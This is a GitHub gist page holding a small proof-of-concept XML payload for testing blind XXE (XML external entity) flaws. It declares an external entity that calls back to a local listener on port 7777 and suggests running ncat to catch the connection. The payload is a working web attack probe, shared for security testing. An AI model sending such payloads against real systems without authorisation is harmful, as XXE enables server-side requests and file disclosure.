Skip to content

Instantly share code, notes, and snippets.

@R41D3NN
Created June 16, 2018 15:55
Show Gist options
  • Save R41D3NN/2d904296597b859abf4de61e8d2129c7 to your computer and use it in GitHub Desktop.
Save R41D3NN/2d904296597b859abf4de61e8d2129c7 to your computer and use it in GitHub Desktop.
Quick POC for testing XXE in controls. Just spin up ncat -l PORT. Useful for seeing the connection made for testing XXE blind.
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://127.0.0.1:7777">
]>
<r>&sp;</r>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment